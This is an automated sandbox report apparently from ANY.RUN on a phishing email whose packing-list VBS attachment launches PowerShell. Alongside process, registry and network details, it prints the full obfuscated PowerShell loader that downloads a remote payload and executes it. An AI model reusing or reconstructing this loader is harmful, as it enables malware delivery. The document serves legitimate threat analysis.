File name:

backup-message-10.149.147.133_9045-13362741.eml

Full analysis: https://app.any.run/tasks/a8ee4e73-4d64-4df5-b25f-c5d468c11a65
Verdict: Malicious activity
Analysis date: July 15, 2025, 07:02:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
attachments
attc-unc
susp-attachments
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5:

35BF88423CEC4964F468B61424FEE505

SHA1:

7F33DDC1124BD3C21C4DAE82C43ECD1B621B8CBE

SHA256:

314876F703E2E2B3CE7F622305B8FDD73D5FD3DD8419D02D60F17F7480E3D6FC

SSDEEP:

3072:0CgIUI6g8T+U5sM4dxmJJoLsXhYaS3C6Ul356qK+MK3AqtD0Xd6JfxXHAZ:0RIUJLTzW5aJJFXmaS3cp6qKcE6Jfx3A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1480)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 1480)

  • SUSPICIOUS

    • Email with suspicious attachment

      • OUTLOOK.EXE (PID: 5080)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2072)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1328)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2072)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2072)

    • The process executes VB scripts

      • WinRAR.exe (PID: 1328)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2072)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1480)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 1480)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 5780)

  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 1328)

    • Email with attachments

      • OUTLOOK.EXE (PID: 5080)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2072)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Checks proxy server information

      • powershell.exe (PID: 1480)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Disables trace logs

      • powershell.exe (PID: 1480)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1480)
      • powershell.exe (PID: 5780)

    • Manual execution by a user

      • powershell.exe (PID: 5780)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
14
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start outlook.exe ai.exe no specs winrar.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs powershell.exe conhost.exe no specs tiworker.exe no specs powershell.exe no specs conhost.exe no specs slui.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.uue"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1352ping 127.0.0.1C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
1480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-Content 'FredninGshensynets';$ByGGelaansrenter55='B';$ByGGelaansrenter55+=[char]58;$BadutsprinGet=(Gcm $ByGGelaansrenter55).CommandType;$BadutsprinGet=[StrinG]$BadutsprinGet;New-Alias -Name Frihandelsomraadet -Value ni;$BadutsprinGet+=':';(Frihandelsomraadet -p $BadutsprinGet -n Fornemmest -value { param ($Farestier);$CakemakinG=6;do {$Eldoradoet+=$Farestier[$CakemakinG];$abbies+=$CakemakinG;$CakemakinG+=7} until(!$Farestier[$CakemakinG])$Eldoradoet});(Frihandelsomraadet -p $BadutsprinGet -n FeltrkkeflGes -value {param ($Foretrdernes);.($Baltsers) ($Foretrdernes)});$Risottos=Fornemmest 'fremmenCaptivERedisstOffici.Hv skeW';$Risottos+=Fornemmest ' AktieeConcilB ersonCBedumbL tekstihomoeaeSlGer nRiGhtaT';$Telefonnummers=Fornemmest 'Ano erMMercuroMotaciz Flam,i ExceslTarksfl tekstaincise/';ConvertTo-Html;$Diaclasis222=Fornemmest 'AnticrTWhiskflC prissNapo e1Firsaa2';$Eskortefartjerne='Yoteut[,iloGynF lsnieGarbelTBldde .Tusk asCanonieBromolrSpro rvUduelii AlderC Un dbeZoophapBaldrio VindiIStifflnHoGGysTRiGsflMForskrAluf fanColl tA SttenG PosttENara tr pises]Garner: Sp re:havbliSBepapeeWardlec Wi dbUSor.elRwanderINonirrtsammenYertholPDiscourBrainfOVulca,tBeherso ybobCUoplseo UnwiGL Vanhe=Smaske$Unpan dRyaeniIMonteraCoGGl,cCircullPerso aTranqusEf,ersiterrakSDap ni2.affeh2Elevat2';$Telefonnummers+=Fornemmest ' Sort 5Fortst. Karak0ar,hic Tipo d(Gra toWUnde.fiR dGebn R.ndsdprocomoMononiwS perGs Tol v NonfreNTakstoTFremdr OutGua1Tilpas0T ffel.Defini0Com.to;Snd rk BeGredWSheddeiOp avenTollbo6N.rmal4Outfal;Ateu,h SiGboxDateab6Refere4ReGi n;S nsic Sco.derGastervp kelo:Pandek1For rd3 Micro9 Tors .MunGar0Galile) Polit En eroGCafeteeMusik cSoldiekSanctioVid re/ Pljn,2inerr.0Afideo1Udf aa0Unfro 0 Vare 1 Sambo0Dif.er1Lnover sk fteFTr taliVlercar SociaeMedlemfMaanedoDinnerx Sperm/skutte1Unof e3Aquila9InGvar.R,debu0';$Skrvebetonen28=Fornemmest 'TinGi U ForejsUnnympEKinaserTire,n-FreskoaKamuflGBuhkerER GerinEjerboT';Get-hotfix;$AGoGe58=Fornemmest 'SkattehMo aiktAlbynutbokserp TynGdsSfr rs:DiGekr/Dic.ro/ProximcReten eEyes onN velltcaressuOrGandrSp ltoyHenstasJu ebrcUbehvlnun hem. firefnSydafreKoalittRepeal/AncraoOSildiGpKos ztpPeddl,eunasseb RaGsoaCanceraachiotr Stap,nStadsGeFoel esNeds.r.Ins.ffqrecalixStofskd';$BaGeblandinGer80=Fornemmest ' Cou t>';$Baltsers=Fornemmest ' BraveiKon,ncEIronm.X';$Raserianfaldets='federals';$Newest='\Maalebords221.Bor';FeltrkkeflGes (Fornemmest 'Centra$StorslGGaulthlTrac loKeddahB nGainacyke alConse :SlynGee Cou,tN unexpw LGprdwjujitsoUmbrabvUnearnE Quake=O,erde$RenouneNskvrdNHoloplVArbejd:JuicedaUanstnP Blackp DribldLeGemlaneuropt FissiaUnfluo+Elasti$Bl ecoNFlushye,toppew.sychoeVietcoSExau hT');FeltrkkeflGes (Fornemmest 'Nonaff$FormalGDis.mbLDoubtyoInt rpbPrewara Uno il Ivrks:Predatf SmalmidisvouXAcholoaPostofTPantefeFaGl esMorato=Dolorb$ DkninaUnneutGGerr GOStr GeG R liGe beryG5VedtGt8Profor.BoGierS Da psPUdGa GlSmeeGrI EnGaGTCharab(Virtua$ Pic rbFGetrhaFamiliGmini teU dereBEnyoaul LeonaaMuriatnEarlocdD spatiMinilanSnusfoG chineeVirks R Tidsb8Ledeor0Sh wdo)');FeltrkkeflGes (Fornemmest $Eskortefartjerne);$AGoGe58=$Fixates[0];$Spinalvskernes=(Fornemmest 'Prophe$AnGlikGResellLProeveoin.tGtbUdlosnauforstLsnowth:Capsulb lrhaeVildttNSp rekZpanyaroSojao tbookliRSn,ckyI UlrikCF rsvaHNeuritl MaGneOScarfsrRecentiBraddeDInc nGeNyttiG= InternKohoveEAdGanGW eGap-CharitoP ewGhBElvareJProGraETapnincPrsenttWavabl RollicsAlmindYUnforcSPersontAn,uilEAfGrsnm.oddyG.Gal.ul$BeGyndRSubkutIEntransE lectoJohaneTNormanTMus.ceo BelnnS');FeltrkkeflGes ($Spinalvskernes);FeltrkkeflGes (Fornemmest 'SlanGe$ RosvrBSarc peEnskyinspurrez vildioApyonitSeksdor .uitai BknercBered h Deconl A.Guiotwirl rEndosmiAfvikld Linoee Cordi.IntrapH Snivee S.lfaa SuGardMo emae UdslurNeutras amalG[Revict$FluoreSzaptiekSlmmetrTyfonevSc eateDesperb bzeree vfdtt NeurooAvoidanUnperfeJacobrnTappeh2G nnem8 tillu]i tell=Fo.oha$BortfjTSubcireAppliklAaraufe Sat,mf BismuoJuvelenPharynnIGanGvuEfter.m MiddemIndkome D,eberMuftids');$Udtryksmiddelet=Fornemmest 'F rstaDRetravod omacWSprGebn';$Udtryksmiddelet+=Fornemmest 'Odontol ReGimoPhy,laa CianoDAmoraif jam,oiEnc anlDes itE';$Aerodromernes24=Fornemmest ' De,bs$ ReliGBNonevaeFiskennAlsikezTomlesoFrijolt Str.jrBetrykiDerivecDisorGhJutti lUpasseoDeGlazrNulliviTaGpapd taveneVanish.Gennem$ProfouUFav,endGenkent OceanrS,etlayObjektkCarambsHvnsbrmA rsaGi StormdstormadS alere G ifflMeatheeStoma.tRadirt.AnstteIFrancan An movpansidoNytaark TenoreRrelse(Syrl n$AnstesA HuertG BroncoRetroGGLimphaeSeiGni5Arbejd8Fartsy, Cusec$BeredeHVentrouEpichimHen ispSyGelelGiGabyeRece trBorofl)';$Humpler=$Enwwove;FeltrkkeflGes (Fornemmest 'Sk lop$ UpbuiG EnamelTuristOBejaelb OvercaVirussLCaptio:RentefhFranchiUnstinnFab,ikT KvllepDropfoRZeuGloo PenepOLiveGeFJazzen=SeiGni(LastbitAswouGePos kos BrGe,TManeGe-Sc,emaP ViolsAKandeltV,kuumH Fo an Oat.f$ByGGemhEffereUOpmrksMCole.cp BlundlPost,nE TomatRAnatom)');while (!$Hintproof) {FeltrkkeflGes (Fornemmest ' Nonac$Staf eGOmkostlNuGl eoRoyaltb Afvikaskiffel Blods: CarpoGKompasuS.risia vrfljtSilkineAdv ntmRatlaaaNyvurdlRsonn aallerhnPaakreeErhverrstandae Chiefn StivesAritme= Kerst$explorSDybderkproGradMitanneRallenfAdre.or.nebrnaGformek BicepkHaandte') ;FeltrkkeflGes $Aerodromernes24;FeltrkkeflGes (Fornemmest 'Hejsed[IndiretGra,swhper.seRInsuccEmaskinaFrouzed Operai SkiffnForeplG dskif.UndervtFo vanH verceRKillifePudsi.aAutoridTetrap]Archkn:Combus:Nordr SFyrretlBiomase ileksE RaaprP oyana( Psych4Sa pet0 eder0Am ahl0Overam)');FeltrkkeflGes (Fornemmest 'E trad$ ymbatGD.mehalTerminOMultipbRe uGGaAtinklLSce ar:nonfisHUntim iB.ttlin Obfu TpaleoeP fortrRTelefooA vrGeoCornetFI,kaGe=Picass(BetaliTZirconE VievasBjr emtRealko-SandarPTrkkorA Chippt C.vaGHlse rv Gtes a$UvishehR sonaUCabotimGymnadPtelex.lNonproeModifir rdiG)') ;FeltrkkeflGes (Fornemmest ' Tr.ns$MisproGMinyanlP litioSaGtneBVarietaIn,alelBaptis:FremmeA La.ten CamioTSidetiA,uldahRPneum cAllee TBardieIEk.pliCUsenetAFl GteLSubj,c=produk$ KvindGHolst lUdslusoMorphoBVlGetuaHu,tiGLHalvo :DriftsAOversirBrnehaBHerba e Taschj AnGstdBjerGeSMordenmNoninfi WeisblDeratiJHerredPDrukmaR ursisoVederhbCa alyL Fre re TappemChevete WankcRC inar+Useful+ Vandt%.ocali$T.istlFBulbidI verisxDkninGAForst.tSonnebeDef.itS Saiti.Splashc tinkeoUdsprGuNeatennS ierst') ;$AGoGe58=$Fixates[$Antarctical]}$ensiled=377684;$retsaG=33339;FeltrkkeflGes (Fornemmest 'Sekret$ Di itGIndfoeL F,akkO TeleobLineaGa napstL Floyd: scottGFactitYGreentRIndberiL mperTRadicahAfGoerECapern Laparo=GrinaG TtesaGFlsomheUnlardtPe ora-brylluCMusselOForoevnBe ruGTretroGEAlternN TykskTNeutra disr p$LazysmhUnmediUR.tmssMKlovneP reaselAntabueAdol sr');FeltrkkeflGes (Fornemmest ' Gliff$ verexGReintrlfede.toShotpubFr seoaSnklodlLalopa:Ddsma UHospitkFyreseaVernacm chlorpIon spdRdnbedyGlidelG ro ortFredsfi fo haGSolbrnhSemifueT leradM tmak Aflsse=Teac e Shuttl[ThrummSProadvyFesttasCelsiutCoheire udsfmReverb.Sa rouC B.nkeoSubjeknKonGetvNonsa eUnhurrrS lvbetLa ime] L.lje: assed: U deaFTu.GmerByraado .sthemSydsjlB PreinaDodGemsEksa eeEksist6Or jon4FejlvuSUnmaidt interr tormiAttr.knDivul GGldela( Trff,$DecadeGBallotyHeterorRaversi Tampot Overch FracteParacy)');FeltrkkeflGes (Fornemmest 'Rektan$Sesh aGVineGalMyelomoDyrebaBBek peAKvstesl orklu: UnspopPrestaeMulcibr AmtsffTor,oeecliserkSpildptDrmautIballplO .ultiNFe estiFremsksSky,ocTMarGinI DahabSHomoplKHelvel Verden=Lennar Arv la[ FurcuSRets,dYKrabassvicariT eactiEPouffdMSploit.FarnesTKomm nE,lanetX nsubTRectot.,fsvkteBlenchNPedan,cMekaniOBrnd sDUfa tei PremuNPrvendGs.jsva] ,rode:Gorman:Lax foAErne tsF diGpcMiel,GiMemoriiRanede. ickacGBundGaeReGanGtMiddelSPaastnTConGrar Kompoi.iasmeNoverfaGC,tobl(Masshl$ AssyrUAntipaKenke,ra bunuemVejmelpnonautdPhoe iy DipleGUnpunittoupeeiFerti GFejlkoHVisitke SemiaD oreGr)');FeltrkkeflGes (Fornemmest 'HnseGa$roerfoGAnGre lHept.toPrimr BParappA Hy oGLGramma:Bactrips jernA Ap rijPe sonAUd iklhSmi,erUPunineeYGr inl boliGL,pildioF berf= Uford$FedtsyPC.mmiteCecidiRTe.tarFTartarE BlaakKParoxyTElektri o ermOlift dN NytaaIAverseSCatharTUpsurGIS,atteS.nsGniKTabors.YdervesFrin,muStockiBBullrus NonsytrossetRCloyediO,eydoN padonG B vGe( Ni,li$Non iteJordryN S ntiSStiftmITandstlD.myarERunestdRun ry,Rteblo$Univ.rrIamb lEBa,keytAnociaShenfreaPandemG Undta)');FeltrkkeflGes $pajahuello;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2072"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa1328.27508\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.vbs" C:\Windows\System32\wscript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4648\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4880"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
5080"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml C:\Users\admin\AppData\Local\Temp\backup-message-10.149.147.133_9045-13362741.emlC:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\outlook.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5288C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5348"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "4778696E-5100-4E0E-88E5-F72D5A31FA66" "53200526-9914-4FB2-AEC8-0767A910B08F" "5080"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\rpcrt4.dll
Total events
36 663
Read events
35 530
Write events
1 012
Delete events
121

Modification events

(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\OUTLOOK\1644
Operation:delete valueName:0
Value:
ซ渐�꿃僁赇臢섙䘱醛ꂾ樁င$驄摽鶲…ީ湕湫睯쥮Ȇ∢්ł¢ᣂ숁씀褎예ﴏ�뾙뚠ǭ჉砃㐶ᇅ೬ዒ漋甀琀氀漀漀欀⸀攀砀攀씀‖ៅ肀줄࠘㈲㈱䐭捥
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\OUTLOOK\1644
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\OUTLOOK\5080
Operation:writeName:0
Value:
0B0E10EA98D565B11AE4419A3A5B6164CD59B32300468E88E7D5E6AAFDED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511D827D2120B6F00750074006C006F006F006B002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{02CAC15F-D4BE-400E-9127-D54982AA4AE9}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{11ADBD74-7DF2-4E8E-802B-B3BCBFD04A78}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{287BF315-5A11-4B2F-B069-B761ADE25A49}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{691E1C12-2693-4D4A-852C-7478657BBE6E}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{6B6B571B-F4E3-4FBB-A83F-0790D11D19AB}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor\{AA8FA310-0939-4CE3-B9BB-AE05B2695110}
Operation:delete keyName:(default)
Value:
(PID) Process:(5080) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\outlook.exe\ETWMonitor
Operation:delete keyName:(default)
Value:
Executable files
0
Suspicious files
5
Text files
14
Unknown types
2

Dropped files

PID
Process
Filename
Type
5080OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook1.pst
MD5:
SHA256:
5080OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF (002).uue:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
5080OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF (002).uuetext
MD5:45C02AD1A99B5D3970B8F44BCBBB2316
SHA256:3A5530BA500C86061A4A8B3113F3D9C072E6B65C660BFD99A437563297662553
1480powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k40sdm5u.ihe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5080OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H22OBXE0\LoadingPhotos_packingList-033IWCF251132062_REF_OLKSJS-033IWCF.uuetext
MD5:45C02AD1A99B5D3970B8F44BCBBB2316
SHA256:3A5530BA500C86061A4A8B3113F3D9C072E6B65C660BFD99A437563297662553
1480powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ey42fid2.iph.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5780powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lcmy5cxz.02g.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5780powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ceyki0ma.lko.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5080OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TableViewPreviewPrefs_2_9C88E982434DAC4A81B300B83BB1E8F0.datxml
MD5:0E092DB99AEE99FDFF9B5B222C732CFD
SHA256:D1614AD99ADED9F6F5C1BE7FE7FFA5124BD04A526580DA3818EA8A954E852AA6
5080OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:182F72A543B6A07F054B91BC0532B2BD
SHA256:0B010D66224D7518BB64B94D26A878992E8A585B672A2AD75DFE158E60650CEB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
28
DNS requests
22
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6676
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1200
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6676
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5080
OUTLOOK.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
1268
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1028
